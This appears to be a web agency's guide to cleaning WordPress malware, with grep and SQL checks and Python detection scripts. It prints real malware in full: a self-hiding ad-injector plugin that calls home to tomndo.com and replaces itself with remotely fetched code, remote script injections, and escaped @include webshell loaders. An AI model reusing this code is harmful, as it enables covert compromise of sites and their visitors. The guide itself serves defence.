WordPress, being the most popular CMS in the world, is a prime target for hackers. As a result, during routine customer interventions we commonly find well-hidden backdoors that the administrator was not aware of: the attacker's goal is to remain as discreet as possible.
Today, compromised sites are not necessarily defaced or simply displaying... These sites are exploited by attackers in the most discreet way possible to avoid detection and removal: this is called an advanced persistent threat.
Indeed, in the majority of cases, the affected sites are those that are no longer updated. WordPress regularly releases core updates to patch critical flaws throughout the year, and the same goes for plugins. If you don't apply them and one of these outdated plugins contains a flaw, it will take a hacker only 5 minutes to discover it, especially thanks to sites like WP Sec.
A more critical flaw is shared hosting: a site that is not yours infects the server, which in turn infects you. Siteground users, for instance, have been victims of infections passing from one site to the next.
That’s why we recommend our dedicated hosting (a single server for you only).
If you're reading this article today, chances are you've dealt with this before and are looking for diagnostic and then disinfection solutions. Look no further: this article summarizes the main actions to take in order to clean your WordPress site of backdoors, shells, malware and viruses.
Analyze your WordPress site with plugins
The first and easiest thing to do on our list is to install a plugin directly on your WordPress. There are several plugins dedicated to security on WordPress, but few of them offer complete analysis from the back office.
The free plugin that we are interested in in this case is:
Wordfence Security – Firewall & Malware Scan
Thanks to this plugin, you can launch in two clicks an analysis of the server, of the modified files and of the most common malware the plugin is able to detect... In short, a complete check-up of your site. This is the first thing to do if you suspect a hack.
Be careful though: the plugin sometimes flags files as malicious because they contain base64-encoded code, which is not always malicious. So always back up your files first, or call an expert.
WARNING: the majority of WordPress malware is designed to evade these WordPress anti-malware plugins.
Search for and delete unknown admin accounts, as well as articles and pages you did not create
Block XML-RPC and REST API if you don’t use them
Never heard of these features? Then chances are you don’t need them. They allow malware to execute code remotely and regenerate itself, so it’s best to block them preemptively.
All this is done in a few clicks with:
iThemes Security (formerly Better WP Security)
After running the automatic hardening of the site, we advise you to register your site with the anti-botnet network. Even if your site is already infected, this has the advantage of blocking the IP of the attacker and of their remote control server (C&C botnet...).
In the options go to the WordPress feature settings:
Then check and select the following options (all the recommended ones actually):
This will limit the risk of re-infection: in general, when your WordPress is infected by malware, even if you delete it, it is automatically re-injected by a remote server that constantly monitors the level of infection of your site via the features we just disabled.
By blocking them the virus will not be re-injected!
Analyze WordPress database tables
It is possible within a WordPress site to inject PHP and JavaScript code directly from a database table. Many plugins exist for this, but it is not these plugins that interest us here: only the method used to execute malicious code.
Some relatively clever malware stores a <script> tag directly in the wp_options table. So consider running an SQL query like this one to make sure you are not affected:
SELECT * FROM `wp_options` WHERE (CONVERT(`option_name` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`option_value` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`autoload` USING utf8mb4) LIKE '%ad_code%') LIMIT 50
Manually, open your WordPress database, go to the options table (wp_options by default, but your prefix may differ) and search there for
<script
or again
<?php
Example of malicious code found at one of our clients:
'ad_code', '\n<script type='text/javascript' src='//aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js'></script>\n<script type='text/javascript' src='//aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js'></script>\n', 'yes'
Here the site will automatically execute the remote files:
aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js
aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js
which are obfuscated WordPress malware injectors (you don't need to be a computer engineer to understand that obfuscated code loaded from a remote host and executed on a WordPress site is likely to be harmful).
Again, be careful about what you find and remove: it can sometimes be the output of simple ad plugins loading Google Ads (for example), or even code injected by legitimate plugins such as Code Snippets.
In case of doubt, we recommend you turn to Acinonyx Web Agency: our experienced staff know how to differentiate malware from a legitimately encoded function.
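As an added example (not part of the original article), here is a Python triage script that applies the same checks to a mysqldump of wp_options offline: it parses the INSERT rows, undoes the SQL escaping, and flags option values carrying remote <script> tags, PHP tags, execution primitives or long base64-looking runs. The dump rows and the host evil.example are constructed for this example.

```python
"""Offline triage of a wp_options dump for injected code (added example)."""
import re

# Constructed mysqldump excerpt: a normal row, an injected ad_code row shaped
# like the one quoted above, and a serialized widget row to show a non-hit.
SAMPLE_DUMP = r"""INSERT INTO `wp_options` VALUES
(1, 'siteurl', 'https://example.com', 'yes'),
(2, 'ad_code', '\n<script type=\'text/javascript\' src=\'//evil.example/bb/2f/82/x.js\'></script>\n', 'yes'),
(3, 'widget_text', 'a:1:{i:0;s:5:\"hello\";}', 'yes');
"""

# One SQL single-quoted literal, honouring the backslash escapes mysqldump writes.
SQL_STR = r"'((?:\\.|[^'\\])*)'"
# One wp_options row: (option_id, option_name, option_value, autoload)
ROW_RE = re.compile(
    r"\(\s*\d+\s*,\s*" + SQL_STR + r"\s*,\s*" + SQL_STR + r"\s*,\s*" + SQL_STR + r"\s*\)",
    re.S,
)
MYSQL_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "0": "\0", "Z": "\x1a"}

# Each indicator is (label, regex). The last one is the article's base64 heuristic
# and is the usual source of false positives (transients, serialized data).
INDICATORS = [
    ("remote script tag", re.compile(r"<script[^>]+src\s*=\s*['\"]?(?://|https?://)", re.I)),
    ("embedded PHP tag", re.compile(r"<\?(?:php|=)", re.I)),
    ("PHP execution primitive",
     re.compile(r"\b(?:eval|assert|base64_decode|gzinflate|str_rot13|create_function)\s*\(", re.I)),
    ("long base64-looking run", re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")),
]


def sql_unescape(literal):
    """Undo mysqldump's backslash escaping inside a single-quoted literal."""
    return re.sub(r"\\(.)", lambda m: MYSQL_ESCAPES.get(m.group(1), m.group(1)), literal, flags=re.S)


def parse_options_dump(dump):
    """Return (option_name, option_value, autoload) tuples from the INSERT statement."""
    return [(sql_unescape(m.group(1)), sql_unescape(m.group(2)), m.group(3)) for m in ROW_RE.finditer(dump)]


def suspicious_reasons(value):
    """Labels of every indicator that fires on one option value."""
    return [label for label, rx in INDICATORS if rx.search(value)]


def scan_options_dump(dump):
    """List of (option_name, reasons) for rows that trip at least one indicator."""
    findings = []
    for name, value, _autoload in parse_options_dump(dump):
        reasons = suspicious_reasons(value)
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in scan_options_dump(SAMPLE_DUMP):
        print(f"{name}: {', '.join(reasons)}")  # ad_code: remote script tag
```

Run it against `mysqldump --skip-extended-insert` output of your own options table; every hit still needs a human look, as the article stresses.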
Analyze file-level changes on the server side
For this step, you will need to connect to SSH in order to execute command lines and analyze their return. For each command, remember to replace “/var/www/wordpress/” with the path to your site.
Over FTP, it is useless to rely on the file modification date because it can easily be falsified. File permissions (chmod), on the other hand, can be a good indicator...
As usual, be careful before deleting files or code snippets that might not be infected (false positives).
Search for mplugin.php in your WordPress plugins folder
This is the most common infection, so it deserves a section of its own. Many customers download nulled or cracked themes or plugins. But nothing is free, and you pay the price later: your site displays advertising that pays the hacker:
This is mplugins.php (even with an extra "s", the malware remains the same).
You will never see anything yourself, because the plugin hides itself from the plugin list, records admin IPs and hides the ads from them; the ads are only visible to third-party visitors:
<?php /** * Plugin Name: Monetization Code plugin * Description: mplugin Shows cusom codes to display your ad codes. * Author: aerin Singh * Version: 1.0 */ error_reporting(0); ini_set('display_errors', 0); $plugin_key='4ab94009633ce74d72c165d5b5577957'; $version='1.2'; add_action('admin_menu', function() { add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' ); remove_submenu_page( 'options-general.php', 'mplugin' ); }); add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin'); function salcode_add_plugin_page_settings_mplugin( $links ) { $links[] = '<a href="' . admin_url( 'options-general.php?page=mplugin' ) . '">' . __('Settings') . '</a>'; return $links; } add_action( 'admin_init', function() { register_setting( 'mplugin-settings', 'default_mont_options' ); register_setting( 'mplugin-settings', 'ad_code' ); register_setting( 'mplugin-settings', 'hide_admin' ); register_setting( 'mplugin-settings', 'hide_logged_in' ); register_setting( 'mplugin-settings', 'display_ad' ); register_setting( 'mplugin-settings', 'search_engines' ); register_setting( 'mplugin-settings', 'auto_update' ); register_setting( 'mplugin-settings', 'ip_admin'); register_setting( 'mplugin-settings', 'cookies_admin' ); register_setting( 'mplugin-settings', 'logged_admin' ); register_setting( 'mplugin-settings', 'log_install' ); }); $ad_code=" <script type='text/javascript' src='//aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js'></script> <script type='text/javascript' src='//aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js'></script> "; $hide_admin='on'; $hide_logged_in='on'; $display_ad='organic'; $search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com'; $auto_update='on'; $ip_admin='on'; $cookies_admin='on'; $logged_admin='on'; $log_install=''; function mplugin_page() { ?> <div class="wrap"> <form 
action="options.php" method="post"> <?php settings_fields( 'mplugin-settings' ); do_settings_sections( 'mplugin-settings' ); $ad_code=''; $hide_admin='on'; $hide_logged_in='on'; $display_ad='organic'; $search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com'; $auto_update='on'; $ip_admin='on'; $cookies_admin='on'; $logged_admin='on'; $log_install=''; ?> <h2>mplugin Plugin</h2> <table> <tr> <th>Ad Code</th> <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td> </tr> <tr> <th>Hide ads to :</th> <td> <input type="hidden" id="default_mont_options" name="default_mont_options" value="on"> <label> <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins </label> <label> <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users </label> <br/> </td> </tr> <tr> <th>Recognize admin by :</th> <td> <label> <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in </label> <label> <input type="checkbox" name="ip_admin" id="ip_admin" <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses </label> <label> <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies </label> </td> </tr> <tr> <th>Display ads to :</th> <td> <select name="display_ad"> <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 
'selected="selected"' : ''; ?>>Organic traffic only</option> <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option> </select> </td> </tr> <tr> <th>Search Engines</th> <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description"> comma separated </p> </td> </tr> <tr> <th>Auto Update :</th> <td> <label> <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin </label><br/> </td> </tr> <tr> <td><?php submit_button(); ?></td> </tr> </table> </form> </div> <?php } /*************************log install***************************/ if(get_option('log_install') !=='1') { if(!$log_installed = @file_get_contents("http://www.tomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"])) { $log_installed = @file_get_contents_mplugin("http://www.tomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]); } } /*************************set default options***************************/ if(get_option('default_mont_options') !=='on') { update_option('ip_admin', $ip_admin); update_option('ad_code', $ad_code); update_option('cookies_admin', $cookies_admin); update_option('logged_admin', $logged_admin); update_option('hide_admin', $hide_admin); update_option('hide_logged_in', $hide_logged_in); update_option('display_ad', $display_ad); update_option('search_engines', $search_engines); update_option('auto_update', $auto_update); update_option('log_install', '1'); } /************************************************************************/ include_once(ABSPATH . 'wp-includes/pluggable.php'); if ( ! 
function_exists( 'display_ad_single' ) ) { function display_ad_single($content){ if(is_single()) { $content=$content.get_option('ad_code');; } return $content; } function display_ad_footer(){ if(!is_single()) { echo get_option('ad_code'); } } //setting cookies if admin logged in function setting_admin_cookie() { setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN); } if(get_option('cookies_admin')=='on') { if(is_user_logged_in()) { add_action( 'init', 'setting_admin_cookie',1 ); } } //log admin IP addresses $vis_ip=getVisIpAddr_mplugin(); if(get_option('ip_admin')=='on') { if(current_user_can('edit_others_pages')) { if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt')) { $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt'); } if (stripos($ip, $vis_ip) === false) { $ip.=$vis_ip.' '; @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip); } } }// end if log admins ip //add cookies to organic traffic if(get_option('display_ad')=='organic') { $search_engines = explode(',', get_option('search_engines')); $referer = $_SERVER['HTTP_REFERER']; $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com'); foreach ($search_engines as $search) { if (strpos($referer,$search)!==false) { setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); $organic=true; } } }//end //display ad if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in()) { $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt'); if (stripos($ips, $vis_ip) === false) { /*****/ if(get_option('display_ad')=='organic') { if($organic==true || isset($_COOKIE['organic'])) { add_filter('the_content','display_ad_single'); add_action('wp_footer','display_ad_footer'); } } else { add_filter('the_content','display_ad_single'); add_action('wp_footer','display_ad_footer'); } /****/ } } /*******************/ //update 
plugin if(get_option('auto_update')=='on') { if( ini_get('allow_url_fopen') ) { if (($new_version = @file_get_contents("http://www.tomndo.com/update.php") OR $new_version = @file_get_contents_mplugin("http://www.tomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } elseif ($new_version = @file_get_contents("http://www.tomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } elseif ($new_version = @file_get_contents("http://www.tomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } } else { if (($new_version = @file_get_contents("http://www.tomndo.com/update.php") OR $new_version = @file_get_contents_mplugin("http://www.tomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } elseif ($new_version = @file_get_contents_mplugin("http://www.tomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } elseif ($new_version = @file_get_contents_mplugin("http://www.tomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } } }//end if auto update /*********************************/ 
}// if function exist function file_get_contents_mplugin($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function hide_plugin_mplugin() { global $wp_list_table; $hidearr = array('mplugin.php'); $myplugins = $wp_list_table->items; foreach ($myplugins as $key => $val) { if (in_array($key,$hidearr)) { unset($wp_list_table->items[$key]); } } } add_action('pre_current_active_plugins', 'hide_plugin_mplugin'); function getVisIpAddr_mplugin() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { return $_SERVER['HTTP_CLIENT_IP']; } else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { return $_SERVER['HTTP_X_FORWARDED_FOR']; } else { return $_SERVER['REMOTE_ADDR']; } } ?>
The "m" stands for money plugin, or how to make your victims profitable.
Here the culprit was UpdraftPlus, found with this SSH command:
grep -r -i --include=*.php 'mplugin.php' /var/www/
Translation: who generated mplugin? Let him denounce himself!
Usually it also infects the /wp-includes/functions.php file, which you will also need to disinfect.
We can only advise you to remove the cracked/nulled plugins involved, even though removing the infected part is enough. Not only is using them illegal, but cracked plugins are almost always infected in some way.
Remember: if it’s free, you’re the product
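Added example, not the article's own code: a Python scanner that scores every PHP file under a plugins directory against the traits visible in the mplugin.php source above (hiding from the plugins list, overwriting its own file with content fetched from a remote host, storing ad markup in an option, logging admin IPs, silencing errors). The indicator weights, the threshold and the two sample plugins written to a temporary directory are constructed by me; UPDATE-HOST-PLACEHOLDER stands in for the real update host.

```python
"""Score plugin files for the self-hiding, self-updating traits of mplugin.php (added example)."""
import os
import re
import tempfile

# Indicators taken from traits in the mplugin.php source quoted above;
# the weights and threshold are my own choices for this example.
INDICATORS = [
    ("hides itself from the plugins list",
     re.compile(r"pre_current_active_plugins|unset\(\s*\$wp_list_table->items"), 3),
    ("overwrites its own file (remote self-update)",
     re.compile(r"file_put_contents\(\s*__FILE__"), 3),
    ("fetches content from a hard-coded remote URL",
     re.compile(r"(?:file_get_contents|curl_setopt)\([^;]*https?://", re.I), 2),
    ("stores ad markup in an option",
     re.compile(r"get_option\(\s*['\"]ad_code['\"]"), 2),
    ("records admin IPs (trusting proxy headers)",
     re.compile(r"HTTP_X_FORWARDED_FOR|HTTP_CLIENT_IP|admin_ips\.txt"), 1),
    ("silences PHP errors",
     re.compile(r"error_reporting\(\s*0\s*\)|ini_set\(\s*['\"]display_errors['\"]\s*,\s*0\s*\)"), 1),
    ("removes its own settings submenu",
     re.compile(r"remove_submenu_page\("), 1),
]
THRESHOLD = 5

# Constructed fixtures: fragments carrying the indicators (not a working plugin)
# next to a harmless plugin, so the scanner has something to compare against.
SAMPLE_FILES = {
    os.path.join("monetization", "mplugin.php"): r"""<?php
/* Plugin Name: Monetization Code plugin */
error_reporting(0);
add_action('pre_current_active_plugins', 'hide_plugin_mplugin');
$new_version = @file_get_contents("http://UPDATE-HOST-PLACEHOLDER/update.php");
@file_put_contents(__FILE__, $new_version);
echo get_option('ad_code');
""",
    os.path.join("hello-footer", "hello-footer.php"): r"""<?php
/* Plugin Name: Hello Footer */
add_action('wp_footer', function () { echo '<p>Hello</p>'; });
""",
}


def score_source(src):
    """Return (total weight, labels) of the indicators found in one PHP source."""
    hits = [(label, weight) for label, rx, weight in INDICATORS if rx.search(src)]
    return sum(w for _, w in hits), [label for label, _ in hits]


def scan_plugins_dir(root, threshold=THRESHOLD):
    """Walk a plugins directory; return (relative path, score, reasons) at or above threshold."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, reasons = score_source(fh.read())
            if score >= threshold:
                flagged.append((os.path.relpath(path, root), score, reasons))
    return sorted(flagged, key=lambda t: -t[1])


def build_sample_tree():
    """Write the constructed fixtures into a fresh temporary plugins directory."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    for rel, src in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(src)
    return root


if __name__ == "__main__":
    for rel, score, reasons in scan_plugins_dir(build_sample_tree()):
        print(f"{score:2d}  {rel}")
        for reason in reasons:
            print(f"      - {reason}")
```

Point `scan_plugins_dir` at your real wp-content/plugins and review anything above the threshold by hand; a single indicator such as error_reporting(0) is common in legitimate plugins and never flags on its own.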
Analyze native WordPress core files
First thing to do: check whether the native WordPress files have been modified. This is the easiest step; just open the files with the following commands:
nano /var/www/wordpress/index.php
nano /var/www/wordpress/wp-config.php
nano /var/www/wordpress/wp-settings.php
And check whether these files contain, at the top or at the bottom, obfuscated code or an "@include". This can be either a sequence of incomprehensible letters and words, or base64-encoded code.
If so: delete them.
You can also use this command to list .php files containing "@include":
grep -r -i --include=*.php '*/ @include' /var/www/
Example of infected code:
@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico";
@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico";
@include "\057var\057www\057htm\154/wp\055inc\154ude\163/Si\155ple\120ie/\056639\146691\061.ic\157";
@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico";
@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico";
@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico";
@include "\057va\162/w\167w/\150tm\154/w\160-i\156cl\165de\163/S\151mp\154eP\151e/\05663\071f6\07111\056ic\157";
@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico";
@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico";
@include "\057v\141r\057w\167w\057h\164m\154/\167p\055i\156c\154u\144e\163/\123i\155p\154e\120i\145/\0566\0639\1466\0711\061.\151c\157";
@include "\057var\057www\057htm\154/wp\055inc\154ude\163/Si\155ple\120ie/\056639\146691\061.ic\157";
@include "\057va\162/w\167w/\150tm\154/w\160-i\156cl\165de\163/S\151mp\154eP\151e/\05663\071f6\07111\056ic\157";
@include "\057v\141r\057w\167w\057h\164m\154/\167p\055i\156c\154u\144e\163/\123i\155p\154e\120i\145/\0566\0639\1466\0711\061.\151c\157";
@include "\057va\162/w\167w/\150tm\154/w\160-i\156cl\165de\163/S\151mp\154eP\151e/\05663\071f6\07111\056ic\157";
It is this type of malware: an obfuscated webshell hidden in a .ico file and injected by a dropper (you must have downloaded a plugin from an unofficial source).
Once decoded on https://www.unphp.net you can see that there are multiple webshells in .ico files that you will have to remove:
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
Remove them and then, with the following command, detect whether there are other infected .ico files:
grep -r -i --include=*.ico 'preg_replace' /var/www/
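Added example (not from the article): a small Python decoder for the octal and hex escape sequences PHP accepts in double-quoted strings, which is the transformation unphp.net performed on the @include lines above, plus a helper that lists the decoded targets whose spelling was hidden behind escapes. The sample prologue reuses the SimplePie path quoted above; the \x-escaped third include and the plain wp-load.php include are constructed.

```python
"""Decode PHP double-quoted string escapes to reveal obfuscated @include targets (added example)."""
import re

# Constructed sample prologue: two octal-escaped includes as quoted in the article,
# one hex-escaped include (constructed) and one plain include as a control.
SAMPLE_PHP = (
    r'@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico"; '
    r'@include "\057va\162/w\167w/\150tm\154/w\160-i\156cl\165de\163/S\151mp\154eP\151e/\05663\071f6\07111\056ic\157"; '
    r'@include "\x2fvar\x2fwww/html/wp-includes/\x2ehidden.ico"; '
    r'include "wp-load.php";'
)

# Single-character escapes PHP recognises in double-quoted strings.
SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "e": "\x1b", "f": "\f",
          "\\": "\\", "$": "$", '"': '"'}
# \NNN (1-3 octal digits), \xHH (1-2 hex digits), \u{HHHH}, or any other escaped char.
ESC_RE = re.compile(r"\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|u\{([0-9A-Fa-f]+)\}|(.))", re.S)
# include/require statements with a double-quoted literal target.
INCLUDE_RE = re.compile(
    r'@?\b(?:include|include_once|require|require_once)\s*\(?\s*"((?:\\.|[^"\\])*)"', re.S
)


def php_unescape(s):
    """Interpret PHP double-quoted escapes; unknown escapes keep their backslash, as PHP does."""
    def repl(m):
        octal, hexa, uni, other = m.groups()
        if octal is not None:
            return chr(int(octal, 8) & 0xFF)   # PHP wraps \400 to a single byte
        if hexa is not None:
            return chr(int(hexa, 16))
        if uni is not None:
            return chr(int(uni, 16))
        return SIMPLE.get(other, "\\" + other)
    return ESC_RE.sub(repl, s)


def decode_includes(php_source):
    """Return (decoded target, was_obfuscated) for each include in order of appearance."""
    results = []
    for m in INCLUDE_RE.finditer(php_source):
        raw = m.group(1)
        results.append((php_unescape(raw), "\\" in raw))
    return results


def hidden_include_targets(php_source):
    """Unique decoded paths that were spelled with escapes: the dropper's tell."""
    seen = []
    for path, obfuscated in decode_includes(php_source):
        if obfuscated and path not in seen:
            seen.append(path)
    return seen


if __name__ == "__main__":
    for path in hidden_include_targets(SAMPLE_PHP):
        print(path)  # the files to inspect and remove
```

Feed it the prologue lifted from an infected index.php or wp-config.php to get the list of dropped files without pasting the sample into a third-party site.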
Usually this is not enough: the core of the malware must be removed to prevent any regeneration. To find it, here are some steps to follow:
Look for files containing obfuscated and/or base64-encoded code
grep -Erl '([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)' /var/www/wordpress/*
grep -Erl '[[:alnum:]/+]{20,}' /var/www/wordpress/*
grep -rl 'base64_encode' /var/www/wordpress/*
These commands list every file containing suspicious code. All that's left to do is analyze them one by one.
Here are some examples of obfuscated malware:
<?php $a2b51c7d0 = 290;$GLOBALS['kf0800b21'] = Array();global $kf0800b21;$kf0800b21 = $GLOBALS;${"x47x4cx4fBx41x4cx53"}['e7ad307'] = "x27x75x34x20x79x7ex7ax7bx43x21x38x4ex51x47x63x29x55x59x42x5bx77x61x62x4cx23x53x71x68x22x5dx3fx58x2cx72x6fx24x6bx3exdx35x78x37x5ex32x57x54x6cx73x76x66x65x69x4dx5ax9x33x3cxax36x5cx67x60x50x7cx64x6ex3ax40x46x4ax7dx2ex2fx25x45x39x70x31x5fx3bx49x30x26x3dx52x48x2ax6ax6dx44x4bx56x2dx28x4fx2bx41x74";$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][50]] = $kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][33];$kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]] = $kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][64];$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][65];$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]] = $kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][97];$kf0800b21[$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]] = 
